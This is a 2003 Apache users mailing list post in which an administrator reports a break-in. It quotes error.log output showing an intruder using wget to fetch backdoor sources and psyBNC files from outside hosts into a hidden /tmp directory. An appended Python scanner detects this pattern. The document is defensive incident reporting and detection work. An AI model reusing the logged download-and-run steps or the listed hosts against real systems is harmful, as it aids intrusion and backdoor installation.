httpd-users mailing list archives

From "Randy McMillan" <ra...@pacinfo.com>
Subject [users@httpd] hacker access shown in error.log
Date Thu, 02 Oct 2003 17:00:39 GMT
I found a hidden folder in my /tmp folder with the psybnc program(s) in it.
It was owned by the www user.  I was looking in the apache logs and found
the example below in the error.log.  It appears as if they can upload files
to the /tmp folder and have shell access as the www user through the web
server but I don't know how.   There doesn't seem to be anything out of the
ordinary in the access.log or just prior in the error_log.  They also try to
get various "ptrace" programs but the kernel is patched for that.

I was running version 2.0.47, and I just upgraded php to 4.3.3 from 4.3.2
and did the recent openssl update.  If it is not related to the updates I
just did, then it would seem to be a configuration issue and I could use
some hints.  I googled some of the program names, but didn't come up with
anything specific.

Thanks
Randy
PacInfo


======== examples of uploads =====================
--16:42:23--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.it... done.
Connecting to members.xoom.it[62.211.66.53]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--16:42:24--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,282 [text/plain]

    0K .                                                     100%    1.22
MB/s

16:42:24 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]

--16:42:24--  http://members.xoom.it/merlotx/bd
           => `/tmp/.tmp/bd'
Resolving members.xoom.it... done.
Connecting to members.xoom.it[62.211.66.51]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://members.xoom.virgilio.it/merlotx/bd [following]
--16:42:25--  http://members.xoom.virgilio.it/merlotx/bd
           => `/tmp/.tmp/bd'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.55]:80... connected.
HTTP request sent, awaiting response... mkdir: cannot create directory
`/tmp/.tmp': File exists
--16:42:25--  http://members.xoom.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.it... done.
Connecting to members.xoom.it[62.211.66.56]:80... 200 OK
Length: 14,437 [text/plain]

    0K ..connected.
HTTP request sent, awaiting response... ......302 Found
Location: http://members.xoom.virgilio.it/merlotx/back.c [following]
--16:42:26--  http://members.xoom.virgilio.it/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.55]:80... .. ....
$

16:42:26 (29.74 KB/s) - `/tmp/.tmp/bd' saved [14437/14437]

--16:42:26--  http://members.xoom.it/merlotx/back20.c
           => `/tmp/.tmp/back30.c'
Resolving members.xoom.it... done.

============== after getting several programs there is this kind of stuff =================
/tmp: Is a directory
/tmp/.tmp/back20.c:1: parse error before `/'
/tmp/.tmp/backlyn.c:1: parse error before `/'
/tmp/.tmp/back20.c:1: parse error before `/'
gunzip: psyBNC2.2.1-linux-i86-static.tar.gz: No such file or directory
gunzip: psyBNC2.2.1-linux-i86-static.tar.gz: No such file or directory
tar: v: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: v: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
sh: cd: /tmp/psybnc/: No such file or directory
sh: cd: /tmp/psybnc/: No such file or directory
--16:42:33--  http://members.xoom.virgilio.it/badangel/psy.conf
           => `/tmp/psybnc'
Resolving members.xoom.virgilio.it... --16:42:33-- 
http://members.xoom.virgilio.it/badangel/ps$
           => `/tmp/psybnc'
Resolving members.xoom.virgilio.it... done.
Connecting to members.xoom.virgilio.it[62.211.66.15]:80... done.
Connecting to members.xoom.virgilio.it[62.211.66.52]:80... connected.
HTTP request sent, awaiting response... connected.
HTTP request sent, awaiting response... 200 OK
Length: 76 [text/plain]

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
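As an added illustration (not from Randy's mail or the Apache project), a small Python scanner for the pattern described above: wget transcripts in error.log that write into /tmp or dot-directories, followed by shell error lines. The sample log lines are constructed and the hostname is a placeholder.

```python
import re
from dataclasses import dataclass

# Constructed sample resembling the transcript quoted in the post;
# the host example.invalid is a placeholder, not a real indicator.
SAMPLE_ERROR_LOG = """\
[Thu Oct 02 16:42:23 2003] [error] [client 192.0.2.10] File does not exist
--16:42:23--  http://example.invalid/merlotx/back.c
           => `/tmp/.tmp/backwget.c'
Resolving example.invalid... done.
HTTP request sent, awaiting response... 200 OK
16:42:24 (1.22 MB/s) - `/tmp/.tmp/backwget.c' saved [1282/1282]
mkdir: cannot create directory `/tmp/.tmp': File exists
sh: cd: /tmp/psybnc/: No such file or directory
"""

FETCH_RE = re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)")
DEST_RE = re.compile(r"^\s*=> `(?P<path>[^']+)'")
SAVED_RE = re.compile(r"- `(?P<path>[^']+)' saved \[(?P<got>\d+)/(?P<total>\d+)\]")
# Tool error messages that should never appear in a web server's error.log.
SHELL_RE = re.compile(r"^(?:sh: |mkdir: |tar: |gunzip: )")

@dataclass
class Fetch:
    url: str
    path: str
    saved: bool = False

def is_suspicious_path(path):
    # Downloads into world-writable scratch space or hidden directories.
    return path.startswith("/tmp/") or "/." in path

def scan_error_log(text):
    """Return (suspicious wget fetches, stray shell error lines)."""
    fetches, shell_lines = [], []
    current = None
    for line in text.splitlines():
        m = FETCH_RE.match(line)
        if m:                      # start of a wget transcript
            current = Fetch(url=m["url"], path="")
            continue
        m = DEST_RE.match(line)
        if m and current is not None:
            current.path = m["path"]
            if is_suspicious_path(current.path):
                fetches.append(current)
            continue
        m = SAVED_RE.search(line)
        if m:                      # mark completed downloads
            for f in fetches:
                if f.path == m["path"]:
                    f.saved = True
            continue
        if SHELL_RE.match(line):
            shell_lines.append(line)
    return fetches, shell_lines
```

Run it over the real error.log to list every URL fetched into /tmp and whether the download completed; the stray shell lines give the rough time window to correlate with access.log.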